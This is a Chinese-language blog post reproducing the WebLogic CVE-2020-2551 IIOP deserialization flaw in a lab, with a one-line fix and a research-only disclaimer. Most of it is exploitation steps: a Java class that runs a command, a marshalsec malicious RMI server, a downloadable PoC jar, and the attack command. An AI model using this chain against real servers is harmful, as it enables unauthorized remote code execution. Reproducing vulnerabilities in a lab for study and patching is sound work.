漏洞概述
攻击者可以通过IIOP协议远程访问Weblogic Server服务器上的远程接口,传入恶意数据,从而获取服务器权限并在未授权情况下远程执行任意代码。
IIOP协议以Java接口的形式对远程对象进行访问,默认启用。
影响版本:
weblogic 10.3.6
weblogic 12.1.3.0
weblogic 12.2.1.3.0
weblogic 12.2.1.4.0
环境搭建
下载地址
https://www.oracle.com/middleware/technologies/weblogic-server-downloads.html
漏洞复现
访问http://your-ip:7001/console看到页面
构造如下java,保存为exp.java
import java.io.IOException;
public class exp {
static{
try {
java.lang.Runtime.getRuntime().exec(new String[]{"cmd","/c","calc"});
} catch (IOException e) {
e.printStackTrace();
}
}
public static void main(String[] args) {
}
}
编译生成exp.class
javac exp.java -source 1.6 -target 1.6
启动web服务
python -m SimpleHTTPServer 80
使用marshalsec起一个恶意的RMI服务
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer “http://192.168.0.103/#exp” 1099
Poc下载地址
https://pan.baidu.com/s/1WancKEtKzXDxwWP0zz3QPg
漏洞攻击,成功弹出calc
java -jar weblogic_CVE_2020_2551.jar 192.168.0.103 7001 rmi://192.168.0.103:1099/exp
修复建议
升级到安全版本
本文始发于微信公众号(锋刃科技):Weblogic CVE-2020-2551 IIOP反序列化漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论